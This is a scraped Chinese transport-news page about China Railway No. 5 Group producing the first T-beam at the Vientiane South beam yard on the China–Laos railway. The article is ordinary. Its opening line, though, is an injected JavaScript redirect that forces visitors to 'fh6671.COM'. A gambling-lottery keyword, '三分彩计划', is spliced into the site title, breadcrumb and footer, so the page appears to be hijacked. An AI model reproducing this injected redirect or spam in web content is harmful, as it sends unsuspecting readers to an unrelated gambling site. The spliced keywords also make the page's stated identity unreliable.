function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 要闻

中老铁路万象南制梁场成功预制首孔T梁

2020-11-18 15:12:17 来源:中国交通新闻网 作者:蒋方槐 周燕

11月18日上午,“一带一路”重点工程建设传来捷报,中铁五局承建的中老铁路最后一个制梁场——万象南制梁场成功预制首孔T梁,这标志着磨万铁路万象至万象南段施工拉开了序幕,吹响了中老铁路“最后一站”建设的号角。

磨万铁路是中老铁路的重要组成部分,北起中国和老挝边境磨憨——磨丁口岸南至老挝首都万象,全长414公里,设计时速160公里。中铁五局万象南制梁场主要承担了磨万铁路万象至万象南255孔T梁的预制和架设等施工任务,梁场内设制梁台座12个,双层存梁台座99个,静载试验台座1个。制梁场日生产能力2孔,最大存梁能力为100单线孔,计划2021年5月底完成制梁工程,7月底完成桥梁架设。

自今年10月18日开工建设以来,项目部始终坚持“精品工程”和“廉洁工程”的建设目标,秉持“高起点谋划、高质量展示、高效率推进,建设示范精品工程”的工作思路,积极发挥“攻坚克难、精益求精、开拓创新、奋勇争先”的“铺架王牌军”精神,克服了海外施工建设施工组织难、疫情防控难、语言沟通难等重重阻碍,超前谋划、周密部署,通过优化梁场建设方案、合理进行资源配置、科学安排生产作业,迅速掀起24小时轮班作业施工大干态势,以精细化管理和强执行落实确保万象南制梁场建设稳步推进,仅用1个月时间实现了从进场到成功首制T梁的良好开局,为磨万铁路万象至万象南段的高质高效建设奠定了坚实基础。后续,项目部将坚持保安全、抓质量、促进度、铸精品,不断掀起施工高潮,为把中老铁路建成“一带一路”、中老友谊标志性工程而努力奋斗。

据悉,磨万铁路是中国“一带一路”倡议下的首个落地项目,也是老挝国家“八五”规划的1号重点项目,承载着老挝“变陆锁国为陆联国”的伟大梦想。磨万铁路的建成将为沿线地区经济社会发展带来强劲的动力,将来还可与泰国、马来西亚等国铁路连通,助力推动东盟区域一体化建设,成为中南半岛南北大动脉的重要组成部分,对于解锁老挝陆路交通困局、实现老挝“工业现代化”长远战略具有划时代的重要意义。

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

三分彩计划围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。